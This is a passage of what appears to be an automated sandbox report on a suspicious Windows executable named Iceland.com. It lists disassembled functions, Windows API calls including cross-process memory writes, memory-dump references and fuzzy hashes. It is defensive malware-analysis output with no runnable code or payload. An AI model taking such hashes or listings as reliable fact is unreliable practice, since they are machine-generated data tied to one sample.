                                                                                                                                                                                                                                                                • Instruction ID: 91bed08f7f9b0f0117223b632ce86a1980aa0af58da78da1902f62b8330088cf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c5f9d4d96d1eee7204a379b09ab9112779ebbae1e0dfc8a0c28c5c9131ee65d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FFF06275100311ABD7219FA8EC99F563BADEF897A0F110624F945D7262DA70D8028B60
                                                                                                                                                                                                                                                                Function 00A90CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00A90B24,?,00A93D41,?,00000001,00A63AF4,?), ref: 00A90CCB
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00A90B24,?,00A93D41,?,00000001,00A63AF4,?), ref: 00A90CD8
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00A90B24,?,00A93D41,?,00000001,00A63AF4,?), ref: 00A90CE5
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00A90B24,?,00A93D41,?,00000001,00A63AF4,?), ref: 00A90CF2
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00A90B24,?,00A93D41,?,00000001,00A63AF4,?), ref: 00A90CFF
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00A90B24,?,00A93D41,?,00000001,00A63AF4,?), ref: 00A90D0C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                • Opcode ID: be64b84cc9f309426a76070a1a7418e88092b4ad827dce58d825e65d55f1428f
                                                                                                                                                                                                                                                                • Instruction ID: f59bc252658840c97ded3af96079ca86869c65b7984ee6e3f49b7a0046d474d7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be64b84cc9f309426a76070a1a7418e88092b4ad827dce58d825e65d55f1428f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D601AE71900B15DFCB30AFA6D980816FBF9BF603553158A3ED19752931C7B0A999DF80
                                                                                                                                                                                                                                                                Function 00A865AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00A865BF
                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00A865D6
                                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 00A865EE
                                                                                                                                                                                                                                                                • KillTimer.USER32(?,0000040A), ref: 00A8660A
                                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00A86624
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                • Opcode ID: 02e6a8e074f7af0707b57d626aa9432b6405ab0611933416b88818bd32a8e5cf
                                                                                                                                                                                                                                                                • Instruction ID: 1f4a9d9f48968b025bf5bc0cb841599aec4b0315d022ffc47058af589399a1c1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02e6a8e074f7af0707b57d626aa9432b6405ab0611933416b88818bd32a8e5cf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74018630500304ABFB24AF50DE5EF967B78FB04705F000669B586610E2FBF4AA458B50
                                                                                                                                                                                                                                                                Function 00A5DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DAD2
                                                                                                                                                                                                                                                                  • Part of subcall function 00A52D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5DB51,00AF1DC4,00000000,00AF1DC4,00000000,?,00A5DB78,00AF1DC4,00000007,00AF1DC4,?,00A5DF75,00AF1DC4), ref: 00A52D4E
                                                                                                                                                                                                                                                                  • Part of subcall function 00A52D38: GetLastError.KERNEL32(00AF1DC4,?,00A5DB51,00AF1DC4,00000000,00AF1DC4,00000000,?,00A5DB78,00AF1DC4,00000007,00AF1DC4,?,00A5DF75,00AF1DC4,00AF1DC4), ref: 00A52D60
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DAE4
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DAF6
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DB08
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DB1A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                • Opcode ID: 07cac9183870c3286be25f46da1753c4c383249d1175a1832124721f4b1d7fb1
                                                                                                                                                                                                                                                                • Instruction ID: 0326cd5eaa8a2aacfb48c2d18504f26b298f6e4ead2fa413781786a3865e974a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07cac9183870c3286be25f46da1753c4c383249d1175a1832124721f4b1d7fb1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BF03033545248AB8634EBA8FAC2D1B77EEFE157527A60C05F809DB501CB30FC848B64
                                                                                                                                                                                                                                                                Function 00A52610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5262E
                                                                                                                                                                                                                                                                  • Part of subcall function 00A52D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5DB51,00AF1DC4,00000000,00AF1DC4,00000000,?,00A5DB78,00AF1DC4,00000007,00AF1DC4,?,00A5DF75,00AF1DC4), ref: 00A52D4E
                                                                                                                                                                                                                                                                  • Part of subcall function 00A52D38: GetLastError.KERNEL32(00AF1DC4,?,00A5DB51,00AF1DC4,00000000,00AF1DC4,00000000,?,00A5DB78,00AF1DC4,00000007,00AF1DC4,?,00A5DF75,00AF1DC4,00AF1DC4), ref: 00A52D60
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A52640
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A52653
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A52664
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A52675
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                • Opcode ID: 97c59adc6efeb236e95568953e4ed5b5268b6be8238e44c21a4e8155145cb737
                                                                                                                                                                                                                                                                • Instruction ID: 44813c7cf165a1f85e941945dec6adeefd766346baa44dee63d7650bec6d2526
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97c59adc6efeb236e95568953e4ed5b5268b6be8238e44c21a4e8155145cb737
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5F0DA759025619B8A22EFD8FD41AA87B64FB36752305094BF81496275C7310907EF84
                                                                                                                                                                                                                                                                Function 00A512B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __freea$_free
                                                                                                                                                                                                                                                                • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                • Opcode ID: c63dca4215aa949b6cf31ade0b56da204c138cab381f8517c363c682b3af1b56
                                                                                                                                                                                                                                                                • Instruction ID: 977e9318e93247a1e2363fde1fbb499f5fe3fc1009b829b295db3e4f1600f354
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c63dca4215aa949b6cf31ade0b56da204c138cab381f8517c363c682b3af1b56
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3BD14775900206DBCB24DF68C895BFAB7B1FF45312F28425AED029B651E3759D88CBA0
                                                                                                                                                                                                                                                                Function 00A83063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A82B1D,?,?,00000034,00000800,?,00000034), ref: 00A8BDF4
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00A830AD
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A82B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00A8BDBF
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00A8BD1C
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A82AE1,00000034,?,?,00001004,00000000,00000000), ref: 00A8BD2C
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A82AE1,00000034,?,?,00001004,00000000,00000000), ref: 00A8BD42
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A8311A
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A83167
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                • Opcode ID: 0a6d48c9094d406113492d7c4cf0bf3ef5b84b9c5fd9f0b7875e9f5f9d85ef25
                                                                                                                                                                                                                                                                • Instruction ID: e00cdeed5db24c15a7f467c9138b2402bc92b6c4de6a8d047502db5b52c9cf3c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a6d48c9094d406113492d7c4cf0bf3ef5b84b9c5fd9f0b7875e9f5f9d85ef25
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7412A72900218BEDF10EBA4CD85ADEBBB8EF49700F104195FA45B7291DA706F85CB60
                                                                                                                                                                                                                                                                Function 00A51A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\314782\Iceland.com,00000104), ref: 00A51AD9
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A51BA4
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A51BAE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                                • API String ID: 2506810119-3378881580
                                                                                                                                                                                                                                                                • Opcode ID: ca7c6aaebef6031e260fdcdf2bfeb13b897211adefc8bcafeb09ec686f769053
                                                                                                                                                                                                                                                                • Instruction ID: 5b873c233db35d34b5f1ef236c1ed772bbea25ed7f432e527e7b7fcfd862b942
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca7c6aaebef6031e260fdcdf2bfeb13b897211adefc8bcafeb09ec686f769053
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3318E75A00218AFCB21DF99DD81EAEBBFCFB85751B1141A6FC0497221E6704E49CB90
                                                                                                                                                                                                                                                                Function 00A8CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00A8CBB1
                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 00A8CBF7
                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00AF29C0,00B85ED0), ref: 00A8CC40
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                • Opcode ID: bf413a7cb8633dfbac46f4573f310b03b45468667ae396ef8c911bbcffc3741a
                                                                                                                                                                                                                                                                • Instruction ID: 17f7efd5006b88b98590811471adc583893feb8e2b0a6d784e1d1f36d14d71cf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf413a7cb8633dfbac46f4573f310b03b45468667ae396ef8c911bbcffc3741a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5416E712043029FD724EF24DD85F5ABBE8AF85724F144A1DF5A997291DB30E904CF62
                                                                                                                                                                                                                                                                Function 00AB4EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00ABDCD0,00000000,?,?,?,?), ref: 00AB4F48
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32 ref: 00AB4F65
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AB4F75
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Long
                                                                                                                                                                                                                                                                • String ID: SysTreeView32
                                                                                                                                                                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                • Opcode ID: 749f89e6aa38fe39b2c1fdd45bef654f11db7bb5c8ec57b7dfe238f0fa8e6a04
                                                                                                                                                                                                                                                                • Instruction ID: 2b818c0cb76ccf7a809bbe9d26a345d0f423f99a0408ed4d81545b948e3dc471
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 749f89e6aa38fe39b2c1fdd45bef654f11db7bb5c8ec57b7dfe238f0fa8e6a04
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2319C71214605AFDB218F78DC45BEA7BA9EB08334F204725F979A31E2D770EC619B50
                                                                                                                                                                                                                                                                Function 00AA3AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00AA3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00AA3AD4,?,?), ref: 00AA3DD5
                                                                                                                                                                                                                                                                • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00AA3AD7
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AA3AF8
                                                                                                                                                                                                                                                                • htons.WSOCK32(00000000,?,?,00000000), ref: 00AA3B63
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                • Opcode ID: 05516f3f079bace77c3695a5d8b04d0d75a30e517cdc278f760a4af67ce2a77c
                                                                                                                                                                                                                                                                • Instruction ID: 380ec02fe99223d04e6e3f046b4a18562ec73ba9ca45db416ab01cd1ca908b4f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05516f3f079bace77c3695a5d8b04d0d75a30e517cdc278f760a4af67ce2a77c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B31707A6002019FCB10CF69C585AA977B2EF56324F248159F8168B7E2D771EE45C770
                                                                                                                                                                                                                                                                Function 00AB4954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00AB49DC
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00AB49F0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AB4A14
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                • Opcode ID: 7b1f47b4e4c94765a467c04644d16e3f3d6386384b2b46fafc03b7205fb845c5
                                                                                                                                                                                                                                                                • Instruction ID: 6c7d6442bb2045770f15fdf4cb8fec1872063f7f4741cf3ea59e96220dd4968f
